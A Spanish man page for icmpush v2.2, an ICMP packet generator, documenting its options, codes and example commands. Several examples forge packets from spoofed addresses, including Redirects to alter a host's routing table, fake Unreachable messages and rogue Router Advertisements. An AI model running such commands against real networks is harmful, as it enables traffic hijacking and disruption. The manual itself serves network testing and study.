#endificmpush-2.2.orig/icmpush.es.80100644000175000017500000004420706664366364014306 0ustar domdom.\" Man page for ICMPush (c) Slayer .\" =============================== .\" .\" You may distribute under the terms of the GNU General Public .\" License as specified in the LICENSE file that comes with the .\" ICMPush v2.2 distribution. 
.\" .\" Man page author: .\" wait_man .\" Date: .\" Mon Feb 8 01:16:09 CET 1999 .\" Translate from the Spanish to English by: .\" BINARIA .\" .TH "ICMPUSH" "8" "22 de Febrero de 1999" "icmpush v2.2" .SH "NOMBRE" icmpush \- Generador de paquetes ICMP .SH "SINOPSIS" .B icmpush .I tipo [opciones] host .SH "DESCRIPCIÓN" .B icmpush es una aplicación para generar diversos tipos de paquetes ICMP. Actualmente soporta los tipos ICMP de error siguientes: \fIRedirect\fP, \fISource Quench\fP, \fITime Exceeded\fP, \fIDestination Unreach\fP, \fIParameter Problem\fP y los tipos ICMP de información siguientes: \fIAddress Mask Request\fP, \fITimestamp\fP, \fIInformation Request\fP, \fIEcho Request\fP, \fIRouter Solicitation\fP y \fIRouter Advertisement\fP. No es misión de esta página describir en profundidad los entresijos del protocolo ICMP, pero cuanto más conocimiento se tenga del mismo, mejor comprensión se tendrá del uso, funcionamiento y utilidades de esta herramienta. La cantidad de argumentos necesarios puede parecer excesiva, pero, como su propio autor indica, la construcción de un paquete ICMP que se ajuste al formato del protocolo requiere una serie de datos imprescindibles que deben ser suministrados desde la línea de comandos. Hacia el final de esta página se incluye una gran cantidad de ejemplos que ilustran algunas de las posibilidades reales de uso de este programa. .SH "OPCIONES" .IP "\fB\-h\fP, \fB--help\fP" Ayuda. .IP "\fB\-V\fP, \fB--version\fP" Versión del programa. .IP "\fB\-v\fP, \fB--verbose\fP" Modo informativo. .IP "\fB\-vv\fP, \fB--more_verbose\fP" Más informativo aún. Útil para depuración. .PP El \fItipo\fP de ICMP, siguiendo un orden por código de menor a mayor, puede ser cualquiera de los siguientes: .IP "\fB\-du\fP, \fB--dest_unreach\fP" Destination Unreach. El paquete IP no pudo ser entregado. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-sq\fP, \fB--src_quench\fP" Source Quench. El paquete IP no se entrega a causa de una congestión en la red. 
Este es tipo ICMP es de \fIerror\fP. .IP "\fB\-red\fP, \fB--redirect\fP" Redirect. Requerimiento para desviar paquetes IP a través de otro router. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-echo\fP, \fB--echo_request\fP" Echo Request. Petición a un host para que devuelva una respuesta de eco. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-rta\fP, \fB--router_advert\fP \fIdirección\fP[\fI/preferencia\fP]" Router Advertisement. El router comunica la disponibilidad de uno o varios routers con dirección \fIdirección\fP y preferencia \fIpreferencia\fP. Si se omite esta última se toma la preferencia por defecto que es 0. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-rts\fP, \fB--router_solicit\fP" Router Solicitation. Requerimiento por parte de un host para que se envíe un anuncio de uno o varios routers. Como el anterior, forma parte del intercambio de mensajes Router Discovery y es un tipo ICMP de \fIinformación\fP. .IP "\fB\-tx\fP, \fB--time_exc\fP" Time Exceeded. Se ha acabado el tiempo de un paquete IP. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-param\fP, \fB--param_problem\fP" Parameter Problem. Valor erróneo en una variable de la cabecera IP. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-tstamp\fP, \fB--timestamp\fP" Timestamp. Solicitud de la hora de un host. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-info\fP, \fB--info_req\fP" Information Request. El host solicita una respuesta Info Reply. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-mask\fP, \fB--mask_req\fP" Address Mask Request. Averiguar la mascara de red para la red local actual. Este tipo ICMP es de \fIinformación\fP. .PP Las \fIopciones\fP pueden ser cualquiera de las siguientes: .IP "\fB\-sp\fP, \fB--spoof\fP \fIdirección\fP" Dirección IP a usar como origen del paquete ICMP. .IP "\fB\-to\fP, \fB--timeout\fP \fIsegundos\fP" Tiempo de espera en segundos para leer las respuestas. Solo es válido para ICMPs de \fIinformación\fP salvo el tipo Router Advertisement (\fB-rta\fP). 
Por defecto es de 5 segundos. Si se indica 0 no se leen las respuestas. .IP "\fB\-n\fP, \fB--no_resolve\fP" No usar resolución DNS de nombre de host. .IP "\fB\-lt\fP, \fB--lifetime\fP \fIsegundos\fP" Tiempo de vida en segundos de un anuncio de router. Válido solo para Router Advertisement (\fI-rta\fP). Por defecto son 1800 segundos (30'). .IP "\fB\-gw\fP, \fB--gateway\fP \fIdirección\fP" Host que actuará como pasarela de ruta en un ICMP Redirect (\fB-red\fP). Por defecto será la dirección de spoof (\fB-sp\fP), si se ha especificado, o la dirección IP del interfaz de salida si no se ha especificado. .IP "\fB\-dest\fP, \fB--route_dest\fP \fIdirección\fP" Host o red destino de ruta en un ICMP Redirect (\fB-red\fP). Esta opción es obligatoria si se envía un ICMP Redirect. .IP "\fB\-orig\fP, \fB--orig_host\fP \fIdirección\fP" Host origen en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto será igual a la IP del host al que se manda el paquete ICMP. .IP "\fB\-psrc\fP, \fB--port_src\fP \fIpuerto\fP" Puerto (tcp o udp) origen a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto es 0. .IP "\fB\-pdst\fP, \fB--port_dest\fP \fIpuerto\fP" Puerto (tcp o udp) destino a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto es 0. .IP "\fB\-prot\fP, \fB--protocol\fP \fIicmp\fP|\fItcp\fP|\fIudp\fP" Protocolo a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Debe ser uno de los tres listados. Por defecto es tcp. .IP "\fB\-id\fP, \fB--echo_id\fP \fIidentificador\fP" Identificador de Echo usado en la cabecera IP que se envía cuando es un ICMP de \fIerror\fP y el protocolo de la cabecera IP (\fB-prot\fP) de los datos de error es icmp. Por defecto es 0. 
.IP "\fB\-seq\fP, \fB--echo_seq\fP \fIsecuencia\fP" Número de secuencia de Echo usado en la cabecera IP que se envía cuando es un ICMP de \fIerror\fP y el protocolo de la cabecera IP (\fB-prot\fP) de los datos de error es icmp. Por defecto es 0. .IP "\fB\-pat\fP, \fB--pattern\fP \fIpatrón\fP" Patrón de datos a enviar en un Echo Request (\fB-echo\fP). .IP "\fB\-gbg\fP, \fB--garbage\fP \fIbytes\fP|\fImax\fP" Cantidad de bytes basura que se enviarán en cualquier paquete ICMP. Con \fImax\fP se envía el máximo posible. .IP "\fB\-ptr\fP, \fB--pointer\fP \fIbyte\fP" Puntero a \fIbyte\fP erróneo en un paquete ICMP indicando un problema en un parámetro. Válido sólo para el tipo Parameter Problem (\fB-param\fP). .IP "\fB\-c\fP, \fB--code\fP \fIcódigo\fP|\fInum\fP|\fImax\fP" Código de ICMP enviado. Código \fIcódigo\fP válido para los tipos Destination Unreach (\fB-du\fP), Redirect (\fB-red\fP) y Time Exceeded (\fB-tx\fP). Se puede especificar un código numérico \fInum\fP para los tipos ICMP que no tienen (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem y Timestamp). Si se usa \fImax\fP se enviará un código ICMP superior a los admitidos. La siguiente sección \fICÓDIGOS ICMP\fP enumera los tipos de código \fIcódigo\fP válidos. .SH "CÓDIGOS ICMP" Los \fIcódigos\fP válidos para usar con los tipos Destination Unreach, Redirect y Time Exceeded son, .IP "- Para usar con el tipo \fBDestination Unreach\fP (\fB-du\fP):" .PP \fInet-unreach\fP (Net Unreachable) indica red de destino no accesible. \fIhost-unreach\fP (Host Unreachable) indica host de destino no accesible. \fIprot-unreach\fP (Protocol Unreachable) indica que el protocolo deseado no está a disposición en el host destino. \fIport-unreach\fP (Port Unreachable) indica que el puerto deseado en el host destino no está disponible. 
\fIfrag-needed\fP (Fragmentation Needed and Don't Fragment was Set) indica que el paquete IP tuvo que ser fragmentado por su tamaño, pero el emisor no lo permitió por medio del flag DF (DON'T FRAGMENT o NO FRAGMENTAR). \fIsroute-fail\fP (Source Route Failed) indica que no se pudo seguir la ruta deseada que se indicaba en el paquete IP. \fInet-unknown\fP (Destination Network Unknown) indica que no se conoce la red de destino. \fIhost-unknown\fP (Destination Host Unknown) indica que no se conoce el host de destino, pero sí la red. \fIhost-isolated\fP (Source Host Isolated) indica que no se puede acceder al host de destino. \fInet-ano\fP (Communication with Destination Network is Administratively Prohibited) indica que el acceso a la red de destino se deniega, vía cortafuegos o similar, por parte del receptor. \fIhost-ano\fP (Communication with Destination Host is Administratively Prohibited) indica que el acceso al host de destino se deniega, vía cortafuegos o procedimiento análogo, por parte del receptor. \fInet-unr-tos\fP (Destination Network Unreachable for Type of Service) indica que no se puede acceder a la red de destino con el tipo de servicio (TOS, type of service) solicitado. \fIhost-unr-tos\fP (Destination Host Unreachable for Type of Service) indica que no se puede acceder al host destino con el TOS solicitado. \fIcom-admin-prohib\fP (Communication Administratively Prohibited) indica que un router no puede encaminar un paquete por filtrado administrativo. \fIhost-precedence-viol\fP (Host Precedence Violation) indica que la precedencia IP del paquete original no está permitida. \fIprecedence-cutoff\fP (Precedence cutoff in effect) indica que se ha intentado enviar un paquete con un nivel de precedencia IP menor que el mínimo impuesto por los administradores. .IP "- Para usar con el tipo \fBRedirect\fP (\fB-red\fP):" .PP \fInet\fP (Redirect Datagram for the Network) indica que el destino es una red. 
\fIhost\fP (Redirect Datagram for the Host) indica que el destino es un host. \fIserv-net\fP (Redirect Datagram for the Type Of Service and Network) indica que el destino es tipo de servicio y red. \fIserv-host\fP (Redirect Datagram for the Type Of Service and Host) indica que el destino es tipo de servicio y host. .PP y .IP "- Para usar con el tipo \fB\Time Exceeded\fP (\fB-tx\fP):" .PP \fIttl\fP (Time to Live exceeded in Transit) indica que el tiempo de vida en la cabecera de un paquete IP se ha agotado. \fIfrag\fP (Fragment Reassembly Time Exceeded) indica que los fragmentos de un paquete IP no han podido ser reensamblados. .SH "CÓDIGOS DE RETORNO" \fBicmpush\fP puede ser usado de una forma muy sencilla en guiones del intérprete de comandos que estemos usando (típicamente \fIbash\fP). El programa devuelve los siguientes códigos al shell que le invocó: .ti Valor Significado .ti ----- ----------- .ti 0 Programa finalizado OK. .ti 1 Número de argumentos incorrecto. .ti 2 Protocolo ICMP desconocido. .ti 3 No se pudo crear socket tipo RAW. .ti 4 Tipo de paquete ICMP incorrecto. .ti 5 Gateway incorrecto. .ti 6 Destino de ruta incorrecto. .ti 7 Código de paquete ICMP incorrecto. .ti 8 Host original incorrecto. .ti 9 Error enviando paquete. .ti 10 Protocolo no implementado todavía. .ti 11 Dirección IP o host de spoof incorrecto. .ti 12 No se pudo reservar memoria para unión data_hdr. .ti 13 Dirección IP o host destino del paquete incorrecto. .ti 14 Protocolo desconocido. .ti 16 Error leyendo socket RAW. .ti 17 Error al iniciar manejador de señal SIGALRM. .ti 18 Los datos que se quieren enviar en el paquete Echo Request son demasiado grandes. .ti 19 Puerto origen incorrecto. .ti 20 Puerto destino incorrecto. .ti 21 Valor de timeout incorrecto. .ti 22 Echo ID incorrecto. .ti 23 Número de secuencia incorrecto. .ti 24 Datos de Echo incorrectos. .ti 25 Error en IP_HDRINCL. .ti 26 Dirección de router en Router Advertisement incorrecta. 
.ti 27 Número de bytes basura incorrecto. .ti 28 Puntero de ICMP Parameter Problem es incorrecto. .SH "EJEMPLOS" - En repuesta a un paquete enviado con origen en el puerto TCP 100 y con destino en el puerto 90, queremos enviar un ICMP Redirect a tontoligo.es para modificar su tabla de rutas con los siguientes datos: 10.12.12.12 como gateway hacia el host death.es enmascarando el origen del paquete como originado desde el host infect.comx: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fI10.12.12.12\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI90 tontoligo.es\fP - En respuesta a un paquete ICMP Echo Request enviado con un ECHO REQUEST id 100 y un numero de secuencia ECHO REQUEST 90, queremos enviar un ICMP Redirect al host almorranas.es para modificar su tabla de rutas con los siguientes datos: el host pizza.death como pasarela hacia el host death.es enmascarando el origen del paquete como originado desde el host infect.comx: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fIpizza.death\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fIicmp\fP \fB-id\fP \fI100\fP \fB-seq\fP \fI90 almorranas.es\fP - Queremos enviar un paquete ICMP Destination Unreach al host 10.2.3.4 diciéndole que nuestro puerto TCP numero 20, conectado con su puerto TCP 2100, es inalcanzable. Nos enmascaramos como el host 10.1.1.1: \fBicmpush -du -sp\fP \fI10.1.1.1\fP \fB-c\fP \fIport-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI2100\fP \fB-pdst\fP \fI20 10.2.3.4\fP - Queremos enviar un paquete ICMP Destination Unreach al host 10.2.3.4 diciéndole que el host inferno.hell y su puerto TCP 69, relacionado con su puerto TCP 666 es inalcanzable. 
Nos enmascaramos como el gateway router.comx: \fBicmpush -du -sp\fP \fIrouter.comx\fP \fB-c\fP \fIhost-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI666\fP \fB-pdst\fP \fI69\fP \fB-orig\fP \fIinferno.hell 10.2.3.4\fP - Queremos enviar un paquete ICMP Source Quench al host ldg02.hell en respuesta a un paquete destinado al host ldg00 con protocolo UDP, puerto origen 100 y destino 200. Nos enmascaramos como el gateway 10.10.10.1: \fBicmpush -sq -sp\fP \fI10.10.10.1\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - Queremos enviar un paquete ICMP Time Exceeded al host ldg02.hell en respuesta a un paquete destinado al host ldg00 con protocolo UDP, puerto origen 100 y puerto destino 200. Nos enmascaramos como el gateway ldg04.hell: \fBicmpush -tx -sp\fP \fIldg04.hell\fP \fB-c\fP \fIfrag\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - Queremos enviar un paquete ICMP Address Mask Request y esperar 10 segundos para ver las respuestas. Enmascararemos el paquete con origen en 10.2.3.4 y lo mandaremos a la dirección 10.0.1.255: \fBicmpush -mask -sp\fP \fI10.2.3.4\fP \fB-to\fP \fI10 10.0.1.255\fP - Queremos enviar un paquete ICMP Timestamp al host sepultura.hell. Enmascaramos el paquete como enviado por el host 10.2.3.1. Usamos el tiempo de espera por defecto, 5 segundos: \fBicmpush -tstamp --spoof\fP \fI10.2.3.1 sepultura.hell\fP - Queremos enviar un paquete ICMP Information Request al host nominas.hell. La dirección origen será nuestra propia dirección IP, y el tiempo de espera será de 20 segundos: \fBicmpush -info -to\fP \fI20 nominas.hell\fP - Queremos enviar un paquete ICMP Router Solicitation al host vagos.hell. 
La dirección de origen será nuestra propia dirección IP, y el tiempo de espera será de 20 segundos: \fBicmpush -rts --timeout\fP \fI20 vagos.hell\fP - Queremos enviar un paquete ICMP Echo Request al host vagos.hell con el patrón de datos 'MiNombreEsGump'. La dirección origen será nuestra propia dirección IP. El tiempo de espera para leer los datos será de 2 segundos: \fBicmpush -echo -data\fP \fIMiNombreEsGump\fP \fB-to\fP \fI2 vagos.hell\fP - Queremos enviar un paquete ICMP Echo Request a 10.12.0.255 con el siguiente patrón de datos: 'D E A T H' (espacios inclusive). La dirección origen la enmascararemos como 192.168.0.255, y no queremos leer las respuestas: \fBicmpush -echo -sp\fP \fI192.168.0.255\fP \fB-data\fP \fI'D E A T H'\fP \fB-to\fP \fI0 192.168.0.255\fP - Queremos enviar un ICMP Destination Unreach al host destino.death pero enviándolo con un código ICMP superior a los legales añadiendo además 60K de datos basura: \fBicmpush -du -c\fP \fImax\fP \fB-gbg\fP \fI60000 destino.death\fP - Queremos enviar un ICMP Router Advertisement al host death.es, diciéndole que los routers a usar son: router1.xtc con preferencia 20, router2.xtc con preferencia 50 y router3.xtc con preferencia por defecto (0). Nos enmascararemos como el router routerpadre.xtc \fBicmpush -rta\fP \fIrouter1.xtc/20\fP \fB-rta\fP \fIrouter2.xtc/50\fP \fB-rta\fP \fIrouter3.xtc\fP \fB-sp\fP \fIrouterpadre.xtc death.es\fP - Queremos enviar un ICMP Parameter Problem al host desgracias.es diciéndole que el paquete que ha enviado al host paleto.org con protocolo udp, puerto origen 13 y puerto destino 53, tiene un error en el byte 13 de la cabecera IP.
Además, le añadiremos todos los bytes basura posibles: \fBicmpush -sp\fP \fIpaleto.org\fP \fB-param -ptr\fP \fI13\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI13\fP \fB-pdst\fP \fI53\fP \fB-gbg\fP \fImax\fP \fIdesgracias.es\fP - Queremos enviar un paquete ICMP Timestamp al host www.paletos.org con el código 38 en lugar del código (0) que llevaría normalmente: \fBicmpush -tstamp -c\fP \fI38 www.paletos.org\fP .SH VER TAMBIÉN Postel, John, "Internet Control Message Protocol - DARPA Internet Program Protocol Specification", \fIRFC 792\fP, USC/Information Sciences Institute, September 1981. Mogul, Jeffrey and John Postel, "Internet Standard Subnetting Procedure", \fIRFC 950\fP, Stanford, USC/Information Sciences Institute, August 1985. Braden, Robert, "Requirements for Internet Hosts - Communication Layers", \fIRFC 1122\fP, USC/Information Sciences Institute, October 1989. Deering, Stephen, "ICMP Router Discovery Messages", \fIRFC 1256\fP, Xerox PARC, September 1991. Baker, Fred, "Requirements for IP Version 4 Routers", \fIRFC 1812\fP, Cisco Systems, June 1995. El \fIcódigo fuente de Linux\fP, en especial todo lo referente al código de red, y principalmente lo referido al protocolo ICMP. .SH AUTOR Slayer